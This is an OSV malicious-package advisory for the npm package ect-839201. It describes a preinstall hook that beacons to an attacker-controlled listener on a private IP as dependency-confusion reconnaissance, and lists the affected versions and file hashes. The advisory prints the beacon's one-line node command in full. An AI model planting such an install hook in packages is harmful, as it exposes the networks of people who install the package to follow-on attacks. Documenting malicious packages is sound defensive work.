MAL-2026-5720
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ect-839201/MAL-2026-5720.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-5720
- Published
- 2026-06-12T21:31:03Z
- Modified
- 2026-06-12T21:46:46.956766456Z
- Summary
- Malicious code in ect-839201 (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (0ac6cc7433a67e0087dfa415071c9338be630c2166cd38ac371afadbdd0161e3)
package.json declares a preinstall lifecycle hook that runs
node -e "require('http').get('http://10.107.121.85:8001/callback_839201')"onnpm install. This unconditionally issues an HTTP GET to a hardcoded RFC1918 address (10.107.121.85:8001) over plaintext, with a path (/callback_839201) that encodes a unique per-package probe identifier. The behavior fires automatically as part of the install lifecycle with no opt-in. The combination of (a) a bare-IP, non-publisher destination, (b) a unique callback identifier matched to the package name, and (c) plaintext HTTP on an internal/private network is the canonical dependency-confusion reconnaissance beacon: it confirms reachability from the installer's network into an attacker-controlled listener and leaks the installer's source IP, install timing, and the fact that this specific probe package resolved inside the target environment. Even though the captured request body is empty, the install itself is the signal — successful callbacks identify victim networks for follow-on attacks. - Database specific
{ "malicious-packages-origins": [ { "id": "IN-MAL-2026-006253", "import_time": "2026-06-12T21:38:19.648555582Z", "sha256": "0ac6cc7433a67e0087dfa415071c9338be630c2166cd38ac371afadbdd0161e3", "source": "amazon-inspector", "modified_time": "2026-06-12T21:31:08Z", "versions": [ "100.0.5" ] }, { "id": "IN-MAL-2026-006259", "versions": [ "100.0.1" ], "sha256": "bc2c87ec3e641238241b56b82bb2f23b1233cb0ee45b84d9a3d13fad5c5bc39f", "source": "amazon-inspector", "modified_time": "2026-06-12T21:31:13Z", "import_time": "2026-06-12T21:38:20.119839154Z" }, { "id": "IN-MAL-2026-006248", "import_time": "2026-06-12T21:38:19.456300826Z", "sha256": "cd3b1145f4a6431cfab9f99386ca5f3836264e9227645c0737f79063f5928c95", "source": "amazon-inspector", "modified_time": "2026-06-12T21:31:04Z", "versions": [ "100.0.6" ] }, { "id": "IN-MAL-2026-006257", "import_time": "2026-06-12T21:38:19.961748554Z", "sha256": "137f5864651bbecabccb0ab802dabf21d4847a2356298863fe8ec6f95bbcd905", "source": "amazon-inspector", "modified_time": "2026-06-12T21:31:12Z", "versions": [ "100.0.7" ] }, { "id": "IN-MAL-2026-006262", "versions": [ "100.0.2" ], "sha256": "7504c126c6e8e509d3735d2d3edaadff2de6dab101bbacbde12b40ee573edcd9", "source": "amazon-inspector", "modified_time": "2026-06-12T21:31:15Z", "import_time": "2026-06-12T21:38:20.225549673Z" }, { "id": "IN-MAL-2026-006263", "versions": [ "100.0.4" ], "sha256": "79672d260811398772fd28f2b618220b4e7f6d929e54faedaf00b989f32b9e54", "source": "amazon-inspector", "modified_time": "2026-06-12T21:31:16Z", "import_time": "2026-06-12T21:38:20.266676903Z" }, { "id": "IN-MAL-2026-006255", "versions": [ "100.0.3" ], "sha256": "b5d429604f05d4613e89de662cf9a108b7da207b369eac2eb743c23aaa64831c", "source": "amazon-inspector", "modified_time": "2026-06-12T21:31:10Z", "import_time": "2026-06-12T21:38:19.873134815Z" }, { "id": "IN-MAL-2026-006260", "versions": [ "100.0.0" ], "sha256": "2d03fd94028c2a6683f9a8e5f9636f5e0a16cf30ef3f07535344bd7843c53383", "source": "amazon-inspector", "modified_time": "2026-06-12T21:31:14Z", "import_time": "2026-06-12T21:38:20.15354305Z" }, { "id": "IN-MAL-2026-006250", "import_time": "2026-06-12T21:38:19.550205336Z", "sha256": "4f438d2e4debb57e29127b425a84338182bd31d2130b5340d41610dc96a09a62", "source": "amazon-inspector", "modified_time": "2026-06-12T21:31:06Z", "versions": [ "100.0.10" ] }, { "id": "IN-MAL-2026-006246", "import_time": "2026-06-12T21:38:19.316219835Z", "sha256": "6103a4281c0985ff8219f68391662609fdcef51e0df00680b776d91180dbfbe3", "source": "amazon-inspector", "modified_time": "2026-06-12T21:31:03Z", "versions": [ "100.0.9" ] }, { "id": "IN-MAL-2026-006252", "import_time": "2026-06-12T21:38:19.615348613Z", "sha256": "69cfc3f6e8933ee43116255f4d6fff43c12a1ad7b52afba21890cf2fa2f37e17", "source": "amazon-inspector", "modified_time": "2026-06-12T21:31:08Z", "versions": [ "100.0.8" ] } ] }- References
-
- https://www.npmjs.com/package/ect-839201/v/100.0.5
- https://www.npmjs.com/package/ect-839201/v/100.0.1
- https://www.npmjs.com/package/ect-839201/v/100.0.6
- https://www.npmjs.com/package/ect-839201/v/100.0.7
- https://www.npmjs.com/package/ect-839201/v/100.0.2
- https://www.npmjs.com/package/ect-839201/v/100.0.4
- https://www.npmjs.com/package/ect-839201/v/100.0.3
- https://www.npmjs.com/package/ect-839201/v/100.0.0
- https://www.npmjs.com/package/ect-839201/v/100.0.10
- https://www.npmjs.com/package/ect-839201/v/100.0.9
- https://www.npmjs.com/package/ect-839201/v/100.0.8
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / ect-839201
Package
- Name
- ect-839201
- View open source insights on deps.dev
- Purl
- pkg:npm/ect-839201
Affected versions
100.*
100.0.0
100.0.1
100.0.2
100.0.3
100.0.4
100.0.5
100.0.6
100.0.7
100.0.8
100.0.9
100.0.10
Database specific
cwes
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
}
]
indicators
{
"evidence_files": [
{
"path": "package.json",
"sha256": "aac14ec3ba4c1c465dc30c2580ef4a24e89ab3f34734db3e7dce6d75b54cf0be",
"tlsh": "d7d097782818e03b66c086f18d234912f132dd1a00087c0ce7e3000f86ee367a4be20c"
}
],
"package_integrity": [
{
"filename": "ect-839201-100.0.5.tgz",
"hashes": {
"sha512_sri": "sha512-h8GG6Q5jrk4z9ANA3NXQph3aQggHqw7+erjv4yc0HJqYi7+0WqSWbmNA3Gh1qQCv5QZycrJEx+QmahyMSj/i1A==",
"sha1": "d9aafce804d15b17c0a9da62018a3afb90dceb93"
}
}
]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ect-839201/MAL-2026-5720.json"